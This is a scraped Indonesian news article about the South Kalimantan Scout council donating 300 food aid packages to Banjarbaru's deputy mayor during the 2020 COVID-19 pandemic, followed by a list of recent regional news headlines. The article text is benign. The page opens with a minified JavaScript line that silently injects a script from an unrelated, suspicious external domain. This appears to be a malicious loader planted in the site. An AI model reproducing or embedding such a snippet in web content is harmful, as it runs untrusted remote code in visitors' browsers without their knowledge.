(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Kwarda Pramuka Kalsel Serahkan 300 Paket Sembako di Banjarbaru


KANALKALIMAMTAN.COM, BANJARBARU – Sebanyak 300 paket sembako diterima Wakil Wali Kota Banjarbaru H Darmawan Jaya Setiawan ke sekretariat Kwartir Cabang Pramuka Kota Banjarbaru, jalan RO Ulin Loktabat Selatan, Sabtu (18/4/2020) pagi.

Ratusan paket sembako merupakan bantuan dari Ketua Kwartir Daerah Gerakan Pramuka Provinsi Kalimantan Selatan Hj Raudhatul Jannah Sahbirin Noor. Rencananya sembako ini akan akan dibagikan lagi kepada seluruh Kwartir Ranting di lima kecamatan se Kota Banjarbaru.

Wakil Walikota Banjarbaru H Darmawan Jaya Setiawan selaku Ketua Kwartir Cabang Pramuka Banjarbaru  mengungkapkan, paket sembako tersebut akan didistribusikan kepada anggota pramuka yang termasuk kelompok keluarga pra sejahtera.

“Saya selaku Wakil Wali Kota Banjarbaru mengucapkan terima kasih kepada Ketua Kwartir Daerah Gerakan Pramuka Provinsi Kalimantan Selatan Hj Raudhatul Jannah Sahbirin Noor yang telah menunjukkan rasa kepeduliannya,” katanya.

Sebanyak 300 paket sembako diterima Wakil Wali Kota Banjarbaru H Darmawan Jaya Setiawan. Foto: humpro banjarbaru

Memang di saat-saat seperti ini, kata Jaya -sapan akrabnya-, seluruh pihak harus saling tolong menolong, meningkatkan rasa kepedulian dan juga sering berbagi dengan sesama. Sehingga, terbangunnya keyakinan bahwa masa sulit akibat pandemi covid-19 ini dapat dilewati.

“Tentu,  keyakinan ini juga harus disertai ikhtiar-ikhtiar kita yaitu melaksanakan anjuran-anjuran pemerintah tetap di rumah, kemudian menggunakan masker, kemudian menjaga jarak dan tentunya harus rajin cuci tangan, menjaga kesehatan, istirahat yang cukup dan makan-makanan yang sehat,” pungkasnya. (kanalkalimantan.com/rico)

Reporter : rdy
Editor : bie

 


Al Ghifari

Recent Posts

Rumah Penuh Air, Pak RT Mengungsi ke Rumah Tetangga

KANALKALIMANTAN.COM, MARTAPURA – Banjir yang melanda Desa Gudang Hirang, Kecamatan Sungaitabuk, Kabupaten Banjar menggenangi sejumlah… Read More

11 jam ago

Lonovila Menoreh Surga Tersembunyi di Perbukitan Menoreh

KANALKALIMANTAN.COM, YOGYAKARTA - Ada tempat yang tidak perlu banyak kata untuk membuat orang betah. Begitu… Read More

12 jam ago

Banjir di Komplek Antasari Perdana II Sungaitabuk, Akses Motor Lumpuh Total

KANALKALIMANTAN.COM, MARTAPURA – Banjir setinggi lutut orang dewasa menggenangi seluruh jalan di Komplek Antasari Perdana… Read More

12 jam ago

Bupati Banjar Bagikan Keperluan Warga Terdampak Banjir di Kelurahan Keraton

KANALKALIMANTAN.COM, MARTAPURA - Banjir di Kabupaten Banjar masih belum menunjukkan penurunan ketinggian air secara signifikan,… Read More

14 jam ago

Resmi! UMP Kalimantan Timur 2026 Naik 5,12%, Jadi Rp3,76 Juta

Upah Minimum Provinsi (UMP) Kalimantan Timur 2026 telah ditetapkan dan ditandatangani oleh Gubernur Rudy Mas’ud… Read More

20 jam ago

Tahun Baru Masalah Lama, Banjir Rendam Pemurus Dalam

KANALKALIMANTAN.COM, BANJARMASIN – Mengawali pergantian tahun, Kota Banjarmasin diguyur hujan dari pagi hingga petang, Kamis… Read More

1 hari ago

This website uses cookies.